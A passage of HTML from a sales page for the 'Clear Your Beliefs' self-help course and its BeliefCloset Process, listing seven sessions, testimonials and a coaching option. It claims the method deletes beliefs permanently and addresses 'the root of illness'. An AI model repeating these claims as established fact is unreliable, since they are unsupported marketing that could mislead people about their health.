beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and 